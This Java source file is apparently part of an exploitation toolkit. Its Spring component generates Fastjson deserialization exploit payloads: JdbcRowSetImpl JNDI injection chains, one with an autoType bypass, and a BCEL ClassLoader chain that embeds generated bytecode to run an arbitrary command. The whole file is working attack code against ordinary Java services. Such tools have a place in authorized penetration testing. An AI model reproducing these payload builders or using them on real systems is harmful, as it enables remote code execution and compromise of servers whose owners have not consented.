package com.oobx.chains;

import org.springframework.stereotype.Component;

import java.util.Base64;
import java.util.Map;

/**
 * Fastjson deserialization exploit chains.
 *
 * Gadgets:
 * - JdbcRowSetImpl JNDI (Fastjson ≤1.2.47 / 1.2.80 autoType bypass)
 * - BCEL ClassLoader (≤1.2.24) — bytecode generated by CustomBytecodeHandler (Javassist)
 *
 * No ASM / custom gadget code — uses CustomBytecodeHandler for class generation.
 */
@Component
public class FastjsonChainHandler implements ChainHandler {

    private final CustomBytecodeHandler bytecodeHandler;

    public FastjsonChainHandler(CustomBytecodeHandler bytecodeHandler) {
        this.bytecodeHandler = bytecodeHandler;
    }

    @Override
    public PayloadResult generate(String chainId, Map<String, Object> params) throws Exception {
        String jndiUrl = (String) params.getOrDefault("jndi_url", "");
        String cmd     = (String) params.getOrDefault("cmd", "id");

        String json = switch (chainId) {
            case "jchains_fastjson", "fastjson_jdbcrowset"  -> jdbcRowSetJson(jndiUrl);
            case "fastjson_jdbcrowset_v2"                   -> jdbcRowSetV2Json(jndiUrl);
            // BCEL: delegate class generation to CustomBytecodeHandler (Javassist), then BCEL-encode
            case "fastjson_bcel"                            -> bcelJson(bcelDriverClassName(cmd, params));
            default -> throw new IllegalArgumentException("Unknown Fastjson chain: " + chainId);
        };

        return new PayloadResult("application/json", json.getBytes(),
            Map.of("jndi_url", jndiUrl, "cmd", cmd, "source", "Fastjson/" + chainId));
    }

    // ── Payload builders ─────────────────────────────────────────────────────

    private String jdbcRowSetJson(String jndiUrl) {
        return String.format(
            "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\"," +
            "\"dataSourceName\":\"%s\"," +
            "\"autoCommit\":true}", jsonEsc(jndiUrl));
    }

    private String jdbcRowSetV2Json(String jndiUrl) {
        return String.format(
            "{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"}," +
            "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\"," +
            "\"dataSourceName\":\"%s\"," +
            "\"autoCommit\":true}", jsonEsc(jndiUrl));
    }

    /**
     * Generate BCEL driverClassName: $$BCEL$$<base64(classBytes) with + → $ and / → !>
     * Class bytes come from CustomBytecodeHandler (Javassist) — no custom ASM.
     */
    private String bcelDriverClassName(String cmd, Map<String, Object> params) throws Exception {
        // Delegate to CustomBytecodeHandler which uses Javassist
        byte[] classBytes = bytecodeHandler.generate("custom_bytecode", params).bytes();
        // BCEL encoding: standard base64 with char substitutions
        String b64 = Base64.getEncoder().encodeToString(classBytes)
                          .replace("+", "$").replace("/", "!");
        return "$$BCEL$$" + b64;
    }

    private String bcelJson(String driverClassName) {
        return String.format(
            "{\"@type\":\"org.apache.commons.dbcp.BasicDataSource\"," +
            "\"driverClassLoader\":{\"@type\":\"com.sun.org.apache.bcel.internal.util.ClassLoader\"}," +
            "\"driverClassName\":\"%s\"}", jsonEsc(driverClassName));
    }

    private static String jsonEsc(String s) {
        return s.replace("\\", "\\\\").replace("\"", "\\\"");
    }
}
